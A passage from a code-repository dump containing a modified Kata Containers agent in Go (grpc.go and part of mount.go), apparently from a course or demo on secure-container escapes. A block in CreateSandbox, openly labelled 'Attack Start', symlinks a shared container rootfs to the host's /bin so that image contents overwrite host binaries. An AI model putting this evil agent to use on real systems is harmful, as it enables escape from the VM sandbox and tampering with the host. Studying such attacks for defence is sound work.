\"\\n\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\n\tresp.ProcessList = result.Bytes()\n\treturn resp, nil\n}\n\nfunc (a *agentGRPC) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {\n\tif req.Resources == nil {\n\t\treturn emptyResp, fmt.Errorf(\"Resources in the request are nil\")\n\t}\n\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// c.container.Config returns a copy of non-pointer members\n\t// in configs.Config, configs.Config.Cgroup is a pointer hence\n\t// if it is modified, the container cgroup is modifed too and\n\t// c.container.Set won't be able to rollback in case of failure.\n\tcontConfig := c.container.Config()\n\tvar resources configs.Resources\n\tif contConfig.Cgroups != nil && contConfig.Cgroups.Resources != nil {\n\t\tresources = *contConfig.Cgroups.Resources\n\t}\n\n\t// Update the value\n\tif req.Resources.BlockIO != nil {\n\t\tresources.BlkioWeight = uint16(req.Resources.BlockIO.Weight)\n\t}\n\n\tif req.Resources.CPU != nil {\n\t\tresources.CpuPeriod = req.Resources.CPU.Period\n\t\tresources.CpuQuota = req.Resources.CPU.Quota\n\t\tresources.CpuShares = req.Resources.CPU.Shares\n\t\tresources.CpuRtPeriod = req.Resources.CPU.RealtimePeriod\n\t\tresources.CpuRtRuntime = req.Resources.CPU.RealtimeRuntime\n\t\tresources.CpusetCpus = req.Resources.CPU.Cpus\n\t\tresources.CpusetMems = req.Resources.CPU.Mems\n\t}\n\n\tif req.Resources.Memory != nil {\n\t\tresources.KernelMemory = req.Resources.Memory.Kernel\n\t\tresources.KernelMemoryTCP = req.Resources.Memory.KernelTCP\n\t\tresources.Memory = req.Resources.Memory.Limit\n\t\tresources.MemoryReservation = req.Resources.Memory.Reservation\n\t\tresources.MemorySwap = req.Resources.Memory.Swap\n\t}\n\n\tif req.Resources.Pids != nil {\n\t\tresources.PidsLimit = req.Resources.Pids.Limit\n\t}\n\n\t// cpuset is a special case where container's cpuset cgroup MUST BE updated\n\tif resources.CpusetCpus != \"\" {\n\t\tresources.CpusetCpus, err = getAvailableCpusetList(resources.CpusetCpus)\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\tcookies := make(cookie)\n\t\tif err = updateCpusetPath(contConfig.Cgroups.Path, resources.CpusetCpus, cookies); err != nil {\n\t\t\tagentLog.WithError(err).Warn(\"Could not update container cpuset cgroup\")\n\t\t}\n\t}\n\n\t// Create a copy of container's cgroup, if c.container.Set fails,\n\t// configuration won't be modified and it will be able to rollback\n\t// to the original container cgroup configuration.\n\tconfig := contConfig\n\tvar cgroupsCopy configs.Cgroup\n\tif contConfig.Cgroups != nil {\n\t\tcgroupsCopy = *contConfig.Cgroups\n\t}\n\tcgroupsCopy.Resources = &resources\n\tconfig.Cgroups = &cgroupsCopy\n\treturn emptyResp, c.container.Set(config)\n}\n\nfunc (a *agentGRPC) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) {\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tstats, err := c.container.Stats()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcgroupData, err := json.Marshal(stats.CgroupStats)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tnetData, err := json.Marshal(stats.Interfaces)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar cgroupStats pb.CgroupStats\n\tnetworkStats := make([]*pb.NetworkStats, 0)\n\n\terr = json.Unmarshal(cgroupData, &cgroupStats)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\terr = json.Unmarshal(netData, &networkStats)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tresp := &pb.StatsContainerResponse{\n\t\tCgroupStats:  &cgroupStats,\n\t\tNetworkStats: networkStats,\n\t}\n\n\treturn resp, nil\n\n}\n\nfunc (a *agentGRPC) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) {\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\treturn emptyResp, c.container.Pause()\n}\n\nfunc (a *agentGRPC) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) {\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\treturn emptyResp, c.container.Resume()\n}\n\nfunc (a *agentGRPC) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) {\n\tctr, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ttimeout := int(req.Timeout)\n\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\tif timeout == 0 {\n\t\tif err := ctr.removeContainer(); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\t// Find the sandbox storage used by this container\n\t\tfor _, path := range ctr.mounts {\n\t\t\tif _, ok := a.sandbox.storages[path]; ok {\n\t\t\t\tif err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\treturn emptyResp, err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} else {\n\t\tdone := make(chan error)\n\t\tgo func() {\n\t\t\tif err := ctr.removeContainer(); err != nil {\n\t\t\t\tdone <- err\n\t\t\t\tclose(done)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t//Find the sandbox storage used by this container\n\t\t\tfor _, path := range ctr.mounts {\n\t\t\t\tif _, ok := a.sandbox.storages[path]; ok {\n\t\t\t\t\tif err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\t\tdone <- err\n\t\t\t\t\t\tclose(done)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tclose(done)\n\t\t}()\n\n\t\tselect {\n\t\tcase err := <-done:\n\t\t\tif err != nil {\n\t\t\t\treturn emptyResp, err\n\t\t\t}\n\t\tcase <-time.After(time.Duration(req.Timeout) * time.Second):\n\t\t\treturn emptyResp, grpcStatus.Errorf(codes.DeadlineExceeded, \"Timeout reached after %ds\", timeout)\n\t\t}\n\t}\n\n\tdelete(a.sandbox.containers, ctr.id)\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) {\n\tproc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn &pb.WriteStreamResponse{}, err\n\t}\n\n\tproc.RLock()\n\tdefer proc.RUnlock()\n\tstdinClosed := proc.stdinClosed\n\n\t// Ignore this call to WriteStdin() if STDIN has already been closed\n\t// earlier.\n\tif stdinClosed {\n\t\treturn &pb.WriteStreamResponse{}, nil\n\t}\n\n\tvar file *os.File\n\tif proc.termMaster != nil {\n\t\tfile = proc.termMaster\n\t} else {\n\t\tfile = proc.stdin\n\t}\n\n\tn, err := file.Write(req.Data)\n\tif err != nil {\n\t\treturn &pb.WriteStreamResponse{}, err\n\t}\n\n\treturn &pb.WriteStreamResponse{\n\t\tLen: uint32(n),\n\t}, nil\n}\n\nfunc (a *agentGRPC) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {\n\tdata, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), true)\n\tif err != nil {\n\t\treturn &pb.ReadStreamResponse{}, err\n\t}\n\n\treturn &pb.ReadStreamResponse{\n\t\tData: data,\n\t}, nil\n}\n\nfunc (a *agentGRPC) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {\n\tdata, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), false)\n\tif err != nil {\n\t\treturn &pb.ReadStreamResponse{}, err\n\t}\n\n\treturn &pb.ReadStreamResponse{\n\t\tData: data,\n\t}, nil\n}\n\nfunc (a *agentGRPC) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) {\n\tproc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// If stdin is nil, which can be the case when using a terminal,\n\t// there is nothing to do.\n\tif proc.stdin == nil {\n\t\treturn emptyResp, nil\n\t}\n\n\tproc.Lock()\n\tdefer proc.Unlock()\n\n\tif err := proc.stdin.Close(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tproc.stdinClosed = true\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) {\n\tproc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif proc.termMaster == nil {\n\t\treturn emptyResp, grpcStatus.Error(codes.FailedPrecondition, \"Terminal is not set, impossible to resize it\")\n\t}\n\n\twinsize := &unix.Winsize{\n\t\tRow: uint16(req.Row),\n\t\tCol: uint16(req.Column),\n\t}\n\n\t// Set new terminal size.\n\tif err := unix.IoctlSetWinsize(int(proc.termMaster.Fd()), unix.TIOCSWINSZ, winsize); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc loadKernelModule(module *pb.KernelModule) error {\n\tif module == nil {\n\t\treturn fmt.Errorf(\"Kernel module is nil\")\n\t}\n\n\tif module.Name == \"\" {\n\t\treturn fmt.Errorf(\"Kernel module name is empty\")\n\t}\n\n\tlog := agentLog.WithFields(logrus.Fields{\n\t\t\"module-name\":   module.Name,\n\t\t\"module-params\": module.Parameters,\n\t})\n\n\tlog.Debug(\"loading module\")\n\tcmd := exec.Command(modprobePath, \"-v\", module.Name)\n\n\tif len(module.Parameters) > 0 {\n\t\tcmd.Args = append(cmd.Args, module.Parameters...)\n\t}\n\n\toutput, err := cmd.CombinedOutput()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not load module: %v: %v\", err, string(output))\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) {\n\tif a.sandbox.running {\n\t\treturn emptyResp, grpcStatus.Error(codes.AlreadyExists, \"Sandbox already started, impossible to start again\")\n\t}\n\n\ta.sandbox.hostname = req.Hostname\n\ta.sandbox.containers = make(map[string]*container)\n\ta.sandbox.network.ifaces = make(map[string]*types.Interface)\n\ta.sandbox.network.dns = req.Dns\n\ta.sandbox.running = true\n\ta.sandbox.sandboxPidNs = req.SandboxPidns\n\ta.sandbox.storages = make(map[string]*sandboxStorage)\n\ta.sandbox.guestHooks = &specs.Hooks{}\n\ta.sandbox.guestHooksPresent = false\n\n\tfor _, m := range req.KernelModules {\n\t\tif err := loadKernelModule(m); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t}\n\n\tif req.GuestHookPath != \"\" {\n\t\ta.sandbox.scanGuestHooks(req.GuestHookPath)\n\t}\n\n\tif req.SandboxId != \"\" {\n\t\ta.sandbox.id = req.SandboxId\n\t\tagentLog = agentLog.WithField(\"sandbox\", a.sandbox.id)\n\t}\n\n\t// Set up shared UTS and IPC namespaces\n\tif err := a.sandbox.setupSharedNamespaces(ctx); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif req.SandboxPidns {\n\t\tif err := a.sandbox.setupSharedPidNs(); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t}\n\n\tmountList, err := addStorages(ctx, req.Storages, a.sandbox)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ta.sandbox.mounts = mountList\n\n\t// ~ Attack Start ~ //\n\tshared_dir := \"/run/kata-containers/shared/containers\"\n\tperm := os.FileMode(0755)\n\t// Create symlink at '/run/kata-containers/shared/containers/mainctr_id/rootfs'\n\t// pointing to the target on the host\n\t// We use the SandboxId as the main ctr id\n\tmainctr_dir := shared_dir + \"/\" + req.SandboxId\n\tif err := os.Mkdir(mainctr_dir, perm); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack Mkdir(SandboxId) (SandboxId = '%s') error: '%s'\", req.SandboxId, err)\n\t}\n\ttarget_on_host := \"/bin\" // the target that'll be mounted with the container image\n\tif err := os.Symlink(target_on_host, mainctr_dir+\"/rootfs\"); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack symlink error: '%s'\", err)\n\t}\n\t// ~ Attack End ~ //\n\n\tif err := setupDNS(a.sandbox.network.dns); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {\n\tif !a.sandbox.running {\n\t\tagentLog.Info(\"Sandbox not started, this is a no-op\")\n\t\treturn emptyResp, nil\n\t}\n\n\ta.sandbox.Lock()\n\n\tfor key, c := range a.sandbox.containers {\n\t\tif err := c.removeContainer(); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\t// Find the sandbox storage used by this container\n\t\tfor _, path := range c.mounts {\n\t\t\tif _, ok := a.sandbox.storages[path]; ok {\n\t\t\t\tif err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\treturn emptyResp, err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tdelete(a.sandbox.containers, key)\n\t}\n\ta.sandbox.Unlock()\n\n\tif err := a.sandbox.removeNetwork(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := removeMounts(a.sandbox.mounts); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.sandbox.teardownSharedPidNs(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.sandbox.unmountSharedNamespaces(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif tracing && !startTracingCalled {\n\t\t// Close stopServer channel to signal the main agent code to stop\n\t\t// the server when all gRPC calls will be completed.\n\t\tclose(a.sandbox.stopServer)\n\t}\n\n\ta.sandbox.hostname = \"\"\n\ta.sandbox.id = \"\"\n\ta.sandbox.containers = make(map[string]*container)\n\ta.sandbox.running = false\n\ta.sandbox.network = network{}\n\ta.sandbox.mounts = []string{}\n\ta.sandbox.storages = make(map[string]*sandboxStorage)\n\n\t// Synchronize the caches on the system. This is needed to ensure\n\t// there is no pending transactions left before the VM is shut down.\n\tsyscall.Sync()\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*types.Interface, error) {\n\treturn a.sandbox.updateInterface(nil, req.Interface)\n}\n\nfunc (a *agentGRPC) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) {\n\treturn a.sandbox.updateRoutes(nil, req.Routes)\n}\n\nfunc (a *agentGRPC) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) {\n\treturn a.sandbox.listInterfaces(nil)\n}\n\nfunc (a *agentGRPC) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) {\n\treturn a.sandbox.listRoutes(nil)\n}\n\nfunc (a *agentGRPC) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) {\n\tif !req.Wait {\n\t\tgo a.onlineCPUMem(req)\n\t\treturn emptyResp, nil\n\t}\n\n\treturn emptyResp, a.onlineCPUMem(req)\n}\n\nfunc (a *agentGRPC) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) {\n\treturn emptyResp, reseedRNG(req.Data)\n}\n\nfunc (a *agentGRPC) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) {\n\tvar details pb.GuestDetailsResponse\n\tif req.MemBlockSize {\n\t\tdata, err := ioutil.ReadFile(sysfsMemoryBlockSizePath)\n\t\tif err != nil {\n\t\t\tif os.IsNotExist(err) {\n\t\t\t\tagentLog.WithField(\"sysfsMemoryBlockSizePath\", sysfsMemoryBlockSizePath).Info(\"Guest kernel config doesn't support memory hotplug\")\n\t\t\t} else {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t} else {\n\t\t\tif len(data) == 0 {\n\t\t\t\treturn nil, fmt.Errorf(\"%v is empty\", sysfsMemoryBlockSizePath)\n\t\t\t}\n\t\t\tdetails.MemBlockSizeBytes, err = strconv.ParseUint(string(data[:len(data)-1]), 16, 64)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\t}\n\n\tif req.MemHotplugProbe {\n\t\tif _, err := os.Stat(sysfsMemoryHotplugProbePath); os.IsNotExist(err) {\n\t\t\tdetails.SupportMemHotplugProbe = false\n\t\t} else if err != nil {\n\t\t\treturn nil, err\n\t\t} else {\n\t\t\tdetails.SupportMemHotplugProbe = true\n\t\t}\n\t}\n\n\tdetails.AgentDetails = a.getAgentDetails(ctx)\n\n\treturn &details, nil\n}\n\nfunc (a *agentGRPC) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) {\n\tfor _, addr := range req.MemHotplugProbeAddr {\n\t\tif err := ioutil.WriteFile(sysfsMemoryHotplugProbePath, []byte(fmt.Sprintf(\"0x%x\", addr)), 0600); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) haveSeccomp() bool {\n\tif seccompSupport == \"yes\" && seccomp.IsEnabled() {\n\t\treturn true\n\t}\n\n\treturn false\n}\n\nfunc (a *agentGRPC) getAgentDetails(ctx context.Context) *pb.AgentDetails {\n\tdetails := pb.AgentDetails{\n\t\tVersion:         version,\n\t\tInitDaemon:      os.Getpid() == 1,\n\t\tSupportsSeccomp: a.haveSeccomp(),\n\t}\n\n\tfor handler := range deviceHandlerList {\n\t\tdetails.DeviceHandlers = append(details.DeviceHandlers, handler)\n\t}\n\n\tfor handler := range storageHandlerList {\n\t\tdetails.StorageHandlers = append(details.StorageHandlers, handler)\n\t}\n\n\treturn &details\n}\n\nfunc (a *agentGRPC) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) {\n\tif err := syscall.Settimeofday(&syscall.Timeval{Sec: req.Sec, Usec: req.Usec}); err != nil {\n\t\treturn nil, grpcStatus.Errorf(codes.Internal, \"Could not set guest time: %v\", err)\n\t}\n\treturn &gpb.Empty{}, nil\n}\n\n// CopyFile copies files form host to container's rootfs (guest). Files can be copied by parts, for example\n// a file which size is 2MB, can be copied calling CopyFile 2 times, in the first call req.Offset is 0,\n// req.FileSize is 2MB and req.Data contains the first half of the file, in the seconds call req.Offset is 1MB,\n// req.FileSize is 2MB and req.Data contains the second half of the file. For security reason all write operations\n// are made in a temporary file, once temporary file reaches the expected size (req.FileSize), it's moved to\n// destination file (req.Path).\nfunc (a *agentGRPC) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {\n\t// get absolute path, to avoid paths like '/run/../sbin/init'\n\tpath, err := filepath.Abs(req.Path)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// container's rootfs is mounted at /run, in order to avoid overwrite guest's rootfs files, only\n\t// is possible to copy files to /run\n\tif !strings.HasPrefix(path, containersRootfsPath) {\n\t\treturn emptyResp, fmt.Errorf(\"Only is possible to copy files into the %s directory\", containersRootfsPath)\n\t}\n\n\tif err := os.MkdirAll(filepath.Dir(path), os.FileMode(req.DirMode)); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// create a temporary file and write the content.\n\ttmpPath := path + \".tmp\"\n\ttmpFile, err := os.OpenFile(tmpPath, os.O_WRONLY|os.O_CREATE, 0600)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif _, err := tmpFile.WriteAt(req.Data, req.Offset); err != nil {\n\t\ttmpFile.Close()\n\t\treturn emptyResp, err\n\t}\n\ttmpFile.Close()\n\n\t// get temporary file information\n\tst, err := os.Stat(tmpPath)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tagentLog.WithFields(logrus.Fields{\n\t\t\"tmp-file-size\": st.Size(),\n\t\t\"expected-size\": req.FileSize,\n\t}).Debugf(\"Checking temporary file size\")\n\n\t// if file size is not equal to the expected size means that copy file operation has not finished.\n\t// CopyFile should be called again with new content and a different offset.\n\tif st.Size() != req.FileSize {\n\t\treturn emptyResp, nil\n\t}\n\n\tif err := os.Chmod(tmpPath, os.FileMode(req.FileMode)); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := os.Chown(tmpPath, int(req.Uid), int(req.Gid)); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// At this point temoporary file has the expected size, atomically move it overwriting\n\t// the destination.\n\tagentLog.WithFields(logrus.Fields{\n\t\t\"tmp-path\": tmpPath,\n\t\t\"des-path\": path,\n\t}).Debugf(\"Moving temporary file\")\n\n\tif err := os.Rename(tmpPath, path); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {\n\t// We chould check 'tracing' too and error if already set. But\n\t// instead, we permit that scenario, making this call a NOP if tracing\n\t// is already enabled via traceModeFlag.\n\tif startTracingCalled {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"tracing already enabled\")\n\t}\n\n\t// The only trace type support for dynamic tracing is isolated.\n\tenableTracing(traceModeDynamic, traceTypeIsolated)\n\tstartTracingCalled = true\n\n\tvar err error\n\n\t// Ignore the provided context and recreate the root context.\n\t// Note that this call will not be traced, but all subsequent ones\n\t// will be.\n\trootSpan, rootContext, err = setupTracing(agentName)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to setup tracing: %v\", err)\n\t}\n\n\ta.sandbox.ctx = rootContext\n\tgrpcContext = rootContext\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {\n\t// Like StartTracing(), this call permits tracing to be stopped when\n\t// it was originally started using traceModeFlag.\n\tif !tracing && !startTracingCalled {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"tracing not enabled\")\n\t}\n\n\tif stopTracingCalled {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"tracing already disabled\")\n\t}\n\n\t// Signal to the interceptors that tracing need to end.\n\tstopTracingCalled = true\n\n\treturn emptyResp, nil\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/mount.go",
    "content": "//\n// Copyright (c) 2017-2019 Intel Corporation\n//\n// SPDX-License-Identifier: Apache-2.0\n//\n\npackage main\n\nimport (\n\t\"bufio\"\n\t\"context\"\n\t\"fmt\"\n\t\"os\"\n\t\"path/filepath\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n\t\"syscall\"\n\n\tpb \"github.com/kata-containers/agent/protocols/grpc\"\n\t\"github.com/pkg/errors\"\n\t\"github.com/sirupsen/logrus\"\n\t\"golang.org/x/sys/unix\"\n\t\"google.golang.org/grpc/codes\"\n\tgrpcStatus \"google.golang.org/grpc/status\"\n)\n\nconst (\n\ttype9pFs       = \"9p\"\n\ttypeVirtioFS   = \"virtio_fs\"\n\ttypeRootfs     = \"rootfs\"\n\ttypeTmpFs      = \"tmpfs\"\n\tprocMountStats = \"/proc/self/mountstats\"\n\tmountPerm      = os.FileMode(0755)\n)\n\nvar flagList = map[string]int{\n\t\"acl\":         unix.MS_POSIXACL,\n\t\"bind\":        unix.MS_BIND,\n\t\"defaults\":    0,\n\t\"dirsync\":     unix.MS_DIRSYNC,\n\t\"iversion\":    unix.MS_I_VERSION,\n\t\"lazytime\":    unix.MS_LAZYTIME,\n\t\"mand\":        unix.MS_MANDLOCK,\n\t\"noatime\":     unix.MS_NOATIME,\n\t\"nodev\":       unix.MS_NODEV,\n\t\"nodiratime\":  unix.MS_NODIRATIME,\n\t\"noexec\":      unix.MS_NOEXEC,\n\t\"nosuid\":      unix.MS_NOSUID,\n\t\"rbind\":       unix.MS_BIND | unix.MS_REC,\n\t\"relatime\":    unix.MS_RELATIME,\n\t\"remount\":     unix.MS_REMOUNT,\n\t\"ro\":          unix.MS_RDONLY,\n\t\"silent\":      unix.MS_SILENT,\n\t\"strictatime\": unix.MS_STRICTATIME,\n\t\"sync\":        unix.MS_SYNCHRONOUS,\n\t\"private\":     unix.MS_PRIVATE,\n\t\"shared\":      unix.MS_SHARED,\n\t\"slave\":       unix.MS_SLAVE,\n\t\"unbindable\":  unix.MS_UNBINDABLE,\n\t\"rprivate\":    unix.MS_PRIVATE | unix.MS_REC,\n\t\"rshared\":     unix.MS_SHARED | unix.MS_REC,\n\t\"rslave\":      unix.MS_SLAVE | unix.MS_REC,\n\t\"runbindable\": unix.MS_UNBINDABLE | unix.MS_REC,\n}\n\nfunc createDestinationDir(dest string) error {\n\ttargetPath, _ := filepath.Split(dest)\n\n\treturn os.MkdirAll(targetPath, mountPerm)\n}\n\n// mount mounts a source in to a destination. This will do some bookkeeping:\n// * evaluate all symlinks\n// * ensure the source exists\nfunc mount(source, destination, fsType string, flags int, options string) error {\n\tvar absSource string\n\n\t// Log before validation. This is useful to debug cases where the gRPC\n\t// protocol version being used by the client is out-of-sync with the\n\t// agents version. gRPC message members are strictly ordered, so it's\n\t// quite possible that if the protocol changes, the client may\n\t// try to pass a valid mountpoint, but the gRPC layer may change that\n\t// through the member ordering to be a mount *option* for example.\n\tagentLog.WithFields(logrus.Fields{\n\t\t\"mount-source\":      source,\n\t\t\"mount-destination\": destination,\n\t\t\"mount-fstype\":      fsType,\n\t\t\"mount-flags\":       flags,\n\t\t\"mount-options\":     options,\n\t}).Debug()\n\n\tif source == \"\" {\n\t\treturn fmt.Errorf(\"need mount source\")\n\t}\n\n\tif destination == \"\" {\n\t\treturn fmt.Errorf(\"need mount destination\")\n\t}\n\n\tif fsType == \"\" {\n\t\treturn fmt.Errorf(\"need mount FS type\")\n\t}\n\n\tvar err error\n\tswitch fsType {\n\tcase type9pFs, typeVirtioFS:\n\t\tif err = createDestinationDir(destination); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tabsSource = source\n\tcase typeTmpFs:\n\t\tabsSource = source\n\tdefault:\n\t\tabsSource, err = filepath.EvalSymlinks(source)\n\t\tif err != nil {\n\t\t\treturn grpcStatus.Errorf(codes.Internal, \"Could not resolve symlink for source %v\", source)\n\t\t}\n\n\t\tif err = ensureDestinationExists(absSource, destination, fsType); err != nil {\n\t\t\treturn grpcStatus.Errorf(codes.Internal, \"Could not create destination mount point: %v: %v\",\n\t\t\t\tdestination, err)\n\t\t}\n\t}\n\n\tif err = syscall.Mount(absSource, destination,\n\t\tfsType, uintptr(flags), options); err != nil {\n\t\treturn grpcStatus.Errorf(codes.Internal, \"Could not mount %v to %v: %v\",\n\t\t\tabsSource, destination, err)\n\t}\n\n\treturn nil\n}\n\n// ensureDestinationExists will recursively create a given mountpoint. If directories\n// are created, their permissions are initialized to mountPerm\nfunc ensureDestinationExists(source, destination string, fsType string) error {\n\tfileInfo, err := os.Stat(source)\n\tif err != nil {\n\t\treturn grpcStatus.Errorf(codes.Internal, \"could not stat source location: %v\",\n\t\t\tsource)\n\t}\n\n\tif err := createDestinationDir(destination); err != nil {\n\t\treturn grpcStatus.Errorf(codes.Internal, \"could not create parent directory: %v\",\n\t\t\tdestination)\n\t}\n\n\tif fsType != \"bind\" || fileInfo.IsDir() {\n\t\tif err := os.Mkdir(destination, mountPerm); !os.IsExist(err) {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tfile, err := os.OpenFile(destination, os.O_CREATE, mountPerm)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tfile.Close()\n\t}\n\treturn nil\n}\n\nfunc parseMountFlagsAndOptions(optionList []string) (int, string) {\n\tvar (\n\t\tflags   int\n\t\toptions []string\n\t)\n\n\tfor _, opt := range optionList {\n\t\tflag, ok := flagList[opt]\n\t\tif ok {\n\t\t\tflags |= flag\n\t\t\tcontinue\n\t\t}\n\n\t\toptions = append(options, opt)\n\t}\n\n\treturn flags, strings.Join(options, \",\")\n}\n\nfunc parseOptions(optionList []string) map[string]string {\n\toptions := make(map[string]string)\n\tfor _, opt := range optionList {\n\t\tidx := strings.Index(opt, \"=\")\n\t\tif idx < 1 {\n\t\t\tcontinue\n\t\t}\n\t\tkey, val := opt[:idx], opt[idx+1:]\n\t\toptions[key] = val\n\t}\n\treturn options\n}\n\nfunc removeMounts(mounts []string) error {\n\tfor _, mount := range mounts {\n\t\tif err := syscall.Unmount(mount, 0); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}\n\n// storageHandler is the type of callback to be defined to handle every\n// type of storage driver.\ntype storageHandler func(ctx context.Context, storage pb.Storage, s *sandbox) (string, error)\n\n// storageHandlerList lists the supported drivers.\nvar storageHandlerList = map[string]storageHandler{\n\tdriver9pType:        virtio9pStorageHandler,\n\tdriverVirtioFSType:  virtioFSStorageHandler,\n\tdriverBlkType:       virtioBlkStorageHandler,\n\tdriverBlkCCWType:    